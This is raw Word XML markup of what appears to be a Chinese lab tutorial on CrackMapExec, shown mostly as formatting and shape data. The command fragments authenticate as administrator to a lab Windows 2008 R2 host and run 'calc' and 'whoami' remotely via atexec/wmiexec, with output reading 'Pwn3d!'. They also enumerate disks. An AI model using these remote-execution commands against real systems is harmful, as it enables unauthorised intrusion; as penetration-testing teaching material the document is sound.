4,15242,6634,15242,6633,15242,6633,15242,6632,15242,6632,15242,6631,15242,6630,15242,6630,15242,6629,15242,6628,15242,6628,15242,6627,15242,6626,15242,6625,15242,6625,15242,6624,15242,6623,15242,6622,15242,6621,15242,6620,15242,6619,15242,6618,15242,6617,15242,6616,15242,6615,15242,6613,15242,6612,15242,6611,15242,6610,15242,6609,15242,6607,15242,6606,15242,6604,15242,6603,15242,6602,15242,6600,15242,6599,15242,6597,15242,6595,15242,6594,15242,6592,15242,6590,15242,6589,15242,6587,15242,6585,15242,6583,15242,6581,15242,6579,15242,6577,15242,6575,15242,6573,15242,6571,15242,6569,15242,6567,15242,6564,15242,6562,15242,6560,15242,6557,15242,6555,15242,6553,15242,6550,15242,6548,15242,6545,15242,6542,15242,6540,15242,6537,15242,6534,15242,6531,15242,6528,15242,6525,15242,6522,15242,6522,15242,6522,15242,6522,15242,6522,15242,6522,15242,6522,15242,6522,15242,6522,15242,6522,15242,6522,15242,6522,15242,6522,15241,6522,15241,6522,15241,6522,15241,6522,15241,6522,15241,6522,15241,6522,15241,6522,15241,6522,15240,6522,15240,6522,15240,6522,15240,6522,15240,6522,15239,6522,15239,6522,15239,6522,15238,6522,15238,6522,15238,6522,15237,6522,15237,6522,15236,6522,15236,6522,15235,6522,15235,6522,15234,6522,15233,6522,15233,6522,15232,6522,15231,6522,15230,6522,15230,6522,15229,6522,15228,6522,15227,6522,15226,6522,15225,6522,15224,6522,15223,6522,15222,6522,15220,6522,15219,6522,15218,6522,15216,6522,15215,6522,15214,6522,15212,6522,15211,6522,15209,6522,15207,6522,15206,6522,15204,6522,15202,6522,15200,6522,15198,6522,15196,6522,15194,6522,15192,6522,15190,6522,15187,6522,15185,6522,15183,6522,15180,6522,15178,6522,15175,6522,15173,6522,15170,6522,15167,6522,15164,6522,15161,6522,15158,6522,15155,6522,15152,6522,15149,6522,15145,6522,15142,6522,15139,6522,15135,6522,15131,6522,15128,6522,15124,6522,15120,6522,15116,6522,15112,6522,15108,6522,15104,6522,15099,6522,15095,6522,15090,6522,15086,6522,15081,6522,15076,6522,15071,6522,15066,6522,15061,6522,15056,6522,15051,6522,15046,6522,15040,6522,15035,6522,15029,6522,15023,6522,15017,6522,15011,6522,15005,6522,14999,6522,14993,6522,14987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-4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>目标机：无运</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>行calc进程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84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root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="ec9800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@John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~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cme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192.168.1.6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8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐u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administrator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9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐p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'123456'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‐‐exec‐m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ethod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atexec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‐x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'calc'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.6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5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BMI9HGC42S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Windows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Web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Server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2008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R2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760</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1324" w:firstLine="0"/>
      </w:pP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x64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name:WIN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5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BMI9HGC42S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domain:WIN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5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BMI9HGC42S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signing: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False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SM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Bv1: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True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4550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.6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5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BMI9HGC42S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+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5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BMI9HGC42S\administrator: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123456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Pwn3d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!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)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4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.6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5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BMI9HGC42S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+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Executed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command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via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atexec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4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20"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>默认采取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="19"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wmiexec执行Command，参数为-x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="378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root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="ec9800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@John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~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cme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192.168.1.6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8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐u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administrator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9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐p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'123456'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8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐x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'whoa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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mi'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.6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5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BMI9HGC42S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Windows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Web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Server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2008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R2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760</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1324" w:firstLine="0"/>
      </w:pP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x64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name:WIN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5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BMI9HGC42S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domain:WIN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5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BMI9HGC42S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signing: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False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SM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Bv1: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True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4550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.6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5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BMI9HGC42S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+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5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BMI9HGC42S\administrator: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123456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Pwn3d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!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)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4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9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.6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5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BMI9HGC42S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15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+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Executed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command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8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.6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5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BMI9HGC42S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win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5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bmi9hgc42s\administrator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95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枚举目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>机disk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root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="ec9800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@John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~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cme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192.168.1.6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10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐u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administrator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10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐p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'123456'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‐‐disks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.6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5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BMI9HGC42S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Windows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Web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Server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2008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R2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760</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1324" w:firstLine="0"/>
      </w:pP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x64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name:WIN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5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BMI9HGC42S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domain:WIN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5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BMI9HGC42S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signing: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False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SM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Bv1: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True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0.0pt;width:0.0pt;height:156.553pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,3131">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:3131" coordorigin="10402,0" coordsize="0,3131" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,2,10402,3,10402,4,10402,5,10402,6,10402,7,10402,9,10402,10,10402,12,10402,14,10402,17,10402,19,10402,22,10402,25,10402,29,10402,32,10402,36,10402,40,10402,45,10402,50,10402,55,10402,60,10402,66,10402,73,10402,79,10402,86,10402,94,10402,101,10402,110,10402,118,10402,128,10402,137,10402,147,10402,158,10402,169,10402,180,10402,192,10402,205,10402,218,10402,232,10402,246,10402,261,10402,276,10402,292,10402,309,10402,326,10402,344,10402,362,10402,381,10402,401,10402,421,10402,442,10402,464,10402,487,10402,510,10402,534,10402,558,10402,584,10402,610,10402,637,10402,665,10402,693,10402,722,10402,752,10402,783,10402,815,10402,848,10402,881,10402,916,10402,951,10402,987,10402,1024,10402,1062,10402,1101,10402,1141,10402,1181,10402,1223,10402,1266,10402,1309,10402,1354,10402,1400,10402,1446,10402,1494,10402,1543,10402,1593,10402,1643,10402,1695,10402,1748,10402,1802,10402,1858,10402,1914,10402,1971,10402,2030,10402,2090,10402,2150,10402,2212,10402,2276,10402,2340,10402,2406,10402,2473,10402,2541,10402,2610,10402,2680,10402,2752,10402,2825,10402,2900,10402,2975,10402,3052,10402,3131e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:990;width:8990;height:650" coordorigin="1490,990" coordsize="8990,650" path="m1510,1000l1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1511,1000,1512,1000,1512,1000,1514,1000,1515,1000,1517,1000,1519,1000,1521,1000,1524,1000,1528,1000,1532,1000,1536,1000,1541,1000,1546,1000,1552,1000,1559,1000,1566,1000,1575,1000,1583,1000,1593,1000,1603,1000,1615,1000,1627,1000,1640,1000,1654,1000,1668,1000,1684,1000,1701,1000,1719,1000,1738,1000,1758,1000,1780,1000,1802,1000,1826,1000,1851,1000,1877,1000,1904,1000,1933,1000,1963,1000,1995,1000,2028,1000,2063,1000,2099,1000,2136,1000,2175,1000,2216,1000,2259,1000,2303,1000,2348,1000,2396,1000,2445,1000,2496,1000,2549,1000,2604,1000,2660,1000,2719,1000,2779,1000,2841,1000,2906,1000,2972,1000,3041,1000,3112,1000,3184,1000,3259,1000,3336,1000,3416,1000,3498,1000,3582,1000,3668,1000,3757,1000,3848,1000,3941,1000,4037,1000,4136,1000,4236,1000,4340,1000,4446,1000,4555,1000,4666,1000,4780,1000,4897,1000,5017,1000,5139,1000,5264,1000,5392,1000,5523,1000,5657,1000,5793,1000,5933,1000,6076,1000,6222,1000,6370,1000,6522,1000,6677,1000,6835,1000,6997,1000,7161,1000,7329,1000,7500,1000,7675,1000,7853,1000,8034,1000,8219,1000,8407,1000,8598,1000,8793,1000,8992,1000,9194,1000,9400,1000,9609,1000,9823,1000,10039,1000,10260,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1005,10484,1006,10484,1007,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1015,10484,1016,10484,1017,10484,1019,10484,1021,10484,1022,10484,1024,10484,1026,10484,1028,10484,1030,10484,1032,10484,1034,10484,1037,10484,1039,10484,1042,10484,1045,10484,1047,10484,1050,10484,1053,10484,1057,10484,1060,10484,1063,10484,1067,10484,1070,10484,1074,10484,1078,10484,1082,10484,1086,10484,1091,10484,1095,10484,1100,10484,1105,10484,1110,10484,1115,10484,1120,10484,1125,10484,1131,10484,1137,10484,1142,10484,1148,10484,1155,10484,1161,10484,1168,10484,1174,10484,1181,10484,1188,10484,1196,10484,1203,10484,1211,10484,1218,10484,1226,10484,1235,10484,1243,10484,1252,10484,1260,10484,1269,10484,1279,10484,1288,10484,1298,10484,1308,10484,1318,10484,1328,10484,1338,10484,1349,10484,1360,10484,1371,10484,1382,10484,1394,10484,1406,10484,1418,10484,1430,10484,1443,10484,1456,10484,1469,10484,1482,10484,1495,10484,1509,10484,1523,10484,1538,10484,1552,10484,1567,10484,1582,10484,1597,10484,1613,10484,1629,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10483,1645,10482,1645,10482,1645,10480,1645,10479,1645,10477,1645,10475,1645,10473,1645,10470,1645,10466,1645,10462,1645,10458,1645,10453,1645,10448,1645,10442,1645,10435,1645,10428,1645,10419,1645,10411,1645,10401,1645,10391,1645,10379,1645,10367,1645,10354,1645,10340,1645,10326,1645,10310,1645,10293,1645,10275,1645,10256,1645,10236,1645,10215,1645,10192,1645,10168,1645,10143,1645,10117,1645,10090,1645,10061,1645,10031,1645,9999,1645,9966,1645,9931,1645,9895,1645,9858,1645,9819,1645,9778,1645,9735,1645,9691,1645,9646,1645,9598,1645,9549,1645,9498,1645,9445,1645,9391,1645,9334,1645,9275,1645,9215,1645,9153,1645,9088,1645,9022,1645,8953,1645,8883,1645,8810,1645,8735,1645,8658,1645,8578,1645,8497,1645,8413,1645,8326,1645,8238,1645,8146,1645,8053,1645,7957,1645,7859,1645,7758,1645,7654,1645,7548,1645,7439,1645,7328,1645,7214,1645,7097,1645,6977,1645,6855,1645,6730,1645,6602,1645,6471,1645,6337,1645,6201,1645,6061,1645,5918,1645,5773,1645,5624,1645,5472,1645,5317,1645,5159,1645,4997,1645,4833,1645,4665,1645,4494,1645,4319,1645,4141,1645,3960,1645,3776,1645,3587,1645,3396,1645,3201,1645,3002,1645,2800,1645,2594,1645,2385,1645,2172,1645,1955,1645,1734,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1643,1510,1643,1510,1643,1510,1642,1510,1642,1510,1641,1510,1641,1510,1640,1510,1640,1510,1639,1510,1638,1510,1637,1510,1636,1510,1635,1510,1634,1510,1633,1510,1632,1510,1631,1510,1630,1510,1628,1510,1627,1510,1625,1510,1624,1510,1622,1510,1620,1510,1618,1510,1616,1510,1614,1510,1612,1510,1610,1510,1608,1510,1605,1510,1602,1510,1600,1510,1597,1510,1594,1510,1591,1510,1588,1510,1585,1510,1581,1510,1578,1510,1574,1510,1570,1510,1566,1510,1562,1510,1558,1510,1554,1510,1549,1510,1544,1510,1540,1510,1535,1510,1530,1510,1524,1510,1519,1510,1513,1510,1508,1510,1502,1510,1496,1510,1490,1510,1483,1510,1477,1510,1470,1510,1463,1510,1456,1510,1449,1510,1441,1510,1434,1510,1426,1510,1418,1510,1410,1510,1401,1510,1393,1510,1384,1510,1375,1510,1366,1510,1356,1510,1347,1510,1337,1510,1327,1510,1316,1510,1306,1510,1295,1510,1284,1510,1273,1510,1262,1510,1250,1510,1238,1510,1226,1510,1214,1510,1202,1510,1189,1510,1176,1510,1162,1510,1149,1510,1135,1510,1121,1510,1107,1510,1092,1510,1077,1510,1062,1510,1047,1510,1031,1510,1016,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:650" coordorigin="1490,990" coordsize="30,650" path="m1517,1000l1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1001,1517,1001,1517,1001,1517,1001,1517,1002,1517,1002,1517,1003,1517,1003,1517,1004,1517,1004,1517,1005,1517,1005,1517,1006,1517,1007,1517,1008,1517,1009,1517,1010,1517,1011,1517,1012,1517,1013,1517,1015,1517,1016,1517,1017,1517,1019,1517,1021,1517,1022,1517,1024,1517,1026,1517,1028,1517,1030,1517,1032,1517,1034,1517,1037,1517,1039,1517,1042,1517,1045,1517,1047,1517,1050,1517,1053,1517,1057,1517,1060,1517,1063,1517,1067,1517,1070,1517,1074,1517,1078,1517,1082,1517,1086,1517,1091,1517,1095,1517,1100,1517,1105,1517,1110,1517,1115,1517,1120,1517,1125,1517,1131,1517,1137,1517,1142,1517,1148,1517,1155,1517,1161,1517,1168,1517,1174,1517,1181,1517,1188,1517,1196,1517,1203,1517,1211,1517,1218,1517,1226,1517,1235,1517,1243,1517,1252,1517,1260,1517,1269,1517,1279,1517,1288,1517,1298,1517,1308,1517,1318,1517,1328,1517,1338,1517,1349,1517,1360,1517,1371,1517,1382,1517,1394,1517,1406,1517,1418,1517,1430,1517,1443,1517,1456,1517,1469,1517,1482,1517,1495,1517,1509,1517,1523,1517,1538,1517,1552,1517,1567,1517,1582,1517,1597,1517,1613,1517,1629,1517,1645e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:81.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1630" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:1630;width:8990;height:370" coordorigin="1490,1630" coordsize="8990,370" path="m1510,1645l1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1511,1645,1512,1645,1512,1645,1514,1645,1515,1645,1517,1645,1519,1645,1521,1645,1524,1645,1528,1645,1532,1645,1536,1645,1541,1645,1546,1645,1552,1645,1559,1645,1566,1645,1575,1645,1583,1645,1593,1645,1603,1645,1615,1645,1627,1645,1640,1645,1654,1645,1668,1645,1684,1645,1701,1645,1719,1645,1738,1645,1758,1645,1780,1645,1802,1645,1826,1645,1851,1645,1877,1645,1904,1645,1933,1645,1963,1645,1995,1645,2028,1645,2063,1645,2099,1645,2136,1645,2175,1645,2216,1645,2259,1645,2303,1645,2348,1645,2396,1645,2445,1645,2496,1645,2549,1645,2604,1645,2660,1645,2719,1645,2779,1645,2841,1645,2906,1645,2972,1645,3041,1645,3112,1645,3184,1645,3259,1645,3336,1645,3416,1645,3498,1645,3582,1645,3668,1645,3757,1645,3848,1645,3941,1645,4037,1645,4136,1645,4236,1645,4340,1645,4446,1645,4555,1645,4666,1645,4780,1645,4897,1645,5017,1645,5139,1645,5264,1645,5392,1645,5523,1645,5657,1645,5793,1645,5933,1645,6076,1645,6222,1645,6370,1645,6522,1645,6677,1645,6835,1645,6997,1645,7161,1645,7329,1645,7500,1645,7675,1645,7853,1645,8034,1645,8219,1645,8407,1645,8598,1645,8793,1645,8992,1645,9194,1645,9400,1645,9609,1645,9823,1645,10039,1645,10260,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1646,10484,1646,10484,1646,10484,1646,10484,1646,10484,1647,10484,1647,10484,1647,10484,1647,10484,1648,10484,1648,10484,1649,10484,1649,10484,1650,10484,1650,10484,1651,10484,1651,10484,1652,10484,1653,10484,1653,10484,1654,10484,1655,10484,1656,10484,1657,10484,1658,10484,1659,10484,1660,10484,1661,10484,1662,10484,1663,10484,1664,10484,1666,10484,1667,10484,1668,10484,1670,10484,1672,10484,1673,10484,1675,10484,1677,10484,1678,10484,1680,10484,1682,10484,1684,10484,1687,10484,1689,10484,1691,10484,1693,10484,1696,10484,1698,10484,1701,10484,1704,10484,1706,10484,1709,10484,1712,10484,1715,10484,1718,10484,1721,10484,1725,10484,1728,10484,1731,10484,1735,10484,1739,10484,1742,10484,1746,10484,1750,10484,1754,10484,1758,10484,1763,10484,1767,10484,1772,10484,1776,10484,1781,10484,1786,10484,1790,10484,1796,10484,1801,10484,1806,10484,1811,10484,1817,10484,1822,10484,1828,10484,1834,10484,1840,10484,1846,10484,1852,10484,1859,10484,1865,10484,1872,10484,1878,10484,1885,10484,1892,10484,1899,10484,1907,10484,1914,10484,1922,10484,1929,10484,1937,10484,1945,10484,1953,10484,1961,10484,1970,10484,1978,10484,1987,10484,1996,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10483,2005,10482,2005,10482,2005,10480,2005,10479,2005,10477,2005,10475,2005,10473,2005,10470,2005,10466,2005,10462,2005,10458,2005,10453,2005,10448,2005,10442,2005,10435,2005,10428,2005,10419,2005,10411,2005,10401,2005,10391,2005,10379,2005,10367,2005,10354,2005,10340,2005,10326,2005,10310,2005,10293,2005,10275,2005,10256,2005,10236,2005,10215,2005,10192,2005,10168,2005,10143,2005,10117,2005,10090,2005,10061,2005,10031,2005,9999,2005,9966,2005,9931,2005,9895,2005,9858,2005,9819,2005,9778,2005,9735,2005,9691,2005,9646,2005,9598,2005,9549,2005,9498,2005,9445,2005,9391,2005,9334,2005,9275,2005,9215,2005,9153,2005,9088,2005,9022,2005,8953,2005,8883,2005,8810,2005,8735,2005,8658,2005,8578,2005,8497,2005,8413,2005,8326,2005,8238,2005,8146,2005,8053,2005,7957,2005,7859,2005,7758,2005,7654,2005,7548,2005,7439,2005,7328,2005,7214,2005,7097,2005,6977,2005,6855,2005,6730,2005,6602,2005,6471,2005,6337,2005,6201,2005,6061,2005,5918,2005,5773,2005,5624,2005,5472,2005,5317,2005,5159,2005,4997,2005,4833,2005,4665,2005,4494,2005,4319,2005,4141,2005,3960,2005,3776,2005,3587,2005,3396,2005,3201,2005,3002,2005,2800,2005,2594,2005,2385,2005,2172,2005,1955,2005,1734,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2004,1510,2004,1510,2004,1510,2004,1510,2004,1510,2004,1510,2003,1510,2003,1510,2003,1510,2002,1510,2002,1510,2002,1510,2001,1510,2001,1510,2000,1510,2000,1510,1999,1510,1999,1510,1998,1510,1997,1510,1997,1510,1996,1510,1995,1510,1994,1510,1993,1510,1992,1510,1991,1510,1990,1510,1989,1510,1988,1510,1987,1510,1986,1510,1984,1510,1983,1510,1981,1510,1980,1510,1978,1510,1977,1510,1975,1510,1973,1510,1971,1510,1969,1510,1967,1510,1965,1510,1963,1510,1961,1510,1959,1510,1956,1510,1954,1510,1952,1510,1949,1510,1946,1510,1944,1510,1941,1510,1938,1510,1935,1510,1932,1510,1929,1510,1925,1510,1922,1510,1918,1510,1915,1510,1911,1510,1907,1510,1904,1510,1900,1510,1896,1510,1891,1510,1887,1510,1883,1510,1878,1510,1874,1510,1869,1510,1864,1510,1859,1510,1854,1510,1849,1510,1844,1510,1839,1510,1833,1510,1827,1510,1822,1510,1816,1510,1810,1510,1804,1510,1798,1510,1791,1510,1785,1510,1778,1510,1771,1510,1765,1510,1758,1510,1750,1510,1743,1510,1736,1510,1728,1510,1721,1510,1713,1510,1705,1510,1697,1510,1688,1510,1680,1510,1671,1510,1663,1510,1654,1510,1645e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:81.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1630" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:1630;width:30;height:370" coordorigin="1490,1630" coordsize="30,370" path="m1517,1645l1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1646,1517,1646,1517,1646,1517,1646,1517,1646,1517,1647,1517,1647,1517,1647,1517,1647,1517,1648,1517,1648,1517,1649,1517,1649,1517,1650,1517,1650,1517,1651,1517,1651,1517,1652,1517,1653,1517,1653,1517,1654,1517,1655,1517,1656,1517,1657,1517,1658,1517,1659,1517,1660,1517,1661,1517,1662,1517,1663,1517,1664,1517,1666,1517,1667,1517,1668,1517,1670,1517,1672,1517,1673,1517,1675,1517,1677,1517,1678,1517,1680,1517,1682,1517,1684,1517,1687,1517,1689,1517,1691,1517,1693,1517,1696,1517,1698,1517,1701,1517,1704,1517,1706,1517,1709,1517,1712,1517,1715,1517,1718,1517,1721,1517,1725,1517,1728,1517,1731,1517,1735,1517,1739,1517,1742,1517,1746,1517,1750,1517,1754,1517,1758,1517,1763,1517,1767,1517,1772,1517,1776,1517,1781,1517,1786,1517,1790,1517,1796,1517,1801,1517,1806,1517,1811,1517,1817,1517,1822,1517,1828,1517,1834,1517,1840,1517,1846,1517,1852,1517,1859,1517,1865,1517,1872,1517,1878,1517,1885,1517,1892,1517,1899,1517,1907,1517,1914,1517,1922,1517,1929,1517,1937,1517,1945,1517,1953,1517,1961,1517,1970,1517,1978,1517,1987,1517,1996,1517,2005e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:99.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1990" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:1990;width:8990;height:390" coordorigin="1490,1990" coordsize="8990,390" path="m1510,2005l1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1511,2005,1512,2005,1512,2005,1514,2005,1515,2005,1517,2005,1519,2005,1521,2005,1524,2005,1528,2005,1532,2005,1536,2005,1541,2005,1546,2005,1552,2005,1559,2005,1566,2005,1575,2005,1583,2005,1593,2005,1603,2005,1615,2005,1627,2005,1640,2005,1654,2005,1668,2005,1684,2005,1701,2005,1719,2005,1738,2005,1758,2005,1780,2005,1802,2005,1826,2005,1851,2005,1877,2005,1904,2005,1933,2005,1963,2005,1995,2005,2028,2005,2063,2005,2099,2005,2136,2005,2175,2005,2216,2005,2259,2005,2303,2005,2348,2005,2396,2005,2445,2005,2496,2005,2549,2005,2604,2005,2660,2005,2719,2005,2779,2005,2841,2005,2906,2005,2972,2005,3041,2005,3112,2005,3184,2005,3259,2005,3336,2005,3416,2005,3498,2005,3582,2005,3668,2005,3757,2005,3848,2005,3941,2005,4037,2005,4136,2005,4236,2005,4340,2005,4446,2005,4555,2005,4666,2005,4780,2005,4897,2005,5017,2005,5139,2005,5264,2005,5392,2005,5523,2005,5657,2005,5793,2005,5933,2005,6076,2005,6222,2005,6370,2005,6522,2005,6677,2005,6835,2005,6997,2005,7161,2005,7329,2005,7500,2005,7675,2005,7853,2005,8034,2005,8219,2005,8407,2005,8598,2005,8793,2005,8992,2005,9194,2005,9400,2005,9609,2005,9823,2005,10039,2005,10260,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2006,10484,2006,10484,2006,10484,2006,10484,2006,10484,2007,10484,2007,10484,2007,10484,2007,10484,2008,10484,2008,10484,2008,10484,2009,10484,2009,10484,2010,10484,2010,10484,2011,10484,2012,10484,2012,10484,2013,10484,2014,10484,2015,10484,2015,10484,2016,10484,2017,10484,2018,10484,2019,10484,2020,10484,2022,10484,2023,10484,2024,10484,2025,10484,2027,10484,2028,10484,2030,10484,2031,10484,2033,10484,2035,10484,2036,10484,2038,10484,2040,10484,2042,10484,2044,10484,2046,10484,2048,10484,2051,10484,2053,10484,2056,10484,2058,10484,2061,10484,2063,10484,2066,10484,2069,10484,2072,10484,2075,10484,2078,10484,2081,10484,2085,10484,2088,10484,2092,10484,2095,10484,2099,10484,2103,10484,2107,10484,2111,10484,2115,10484,2119,10484,2123,10484,2128,10484,2132,10484,2137,10484,2142,10484,2147,10484,2152,10484,2157,10484,2162,10484,2167,10484,2173,10484,2178,10484,2184,10484,2190,10484,2196,10484,2202,10484,2208,10484,2215,10484,2221,10484,2228,10484,2234,10484,2241,10484,2248,10484,2255,10484,2263,10484,2270,10484,2278,10484,2285,10484,2293,10484,2301,10484,2310,10484,2318,10484,2326,10484,2335,10484,2344,10484,2353,10484,2362,10484,2371,10484,2380,10484,2380,10484,2380,10484,2380,10484,2380,10484,2380,10484,2380,10483,2380,10482,2380,10482,2380,10480,2380,10479,2380,10477,2380,10475,2380,10473,2380,10470,2380,10466,2380,10462,2380,10458,2380,10453,2380,10448,2380,10442,2380,10435,2380,10428,2380,10419,2380,10411,2380,10401,2380,10391,2380,10379,2380,10367,2380,10354,2380,10340,2380,10326,2380,10310,2380,10293,2380,10275,2380,10256,2380,10236,2380,10215,2380,10192,2380,10168,2380,10143,2380,10117,2380,10090,2380,10061,2380,10031,2380,9999,2380,9966,2380,9931,2380,9895,2380,9858,2380,9819,2380,9778,2380,9735,2380,9691,2380,9646,2380,9598,2380,9549,2380,9498,2380,9445,2380,9391,2380,9334,2380,9275,2380,9215,2380,9153,2380,9088,2380,9022,2380,8953,2380,8883,2380,8810,2380,8735,2380,8658,2380,8578,2380,8497,2380,8413,2380,8326,2380,8238,2380,8146,2380,8053,2380,7957,2380,7859,2380,7758,2380,7654,2380,7548,2380,7439,2380,7328,2380,7214,2380,7097,2380,6977,2380,6855,2380,6730,2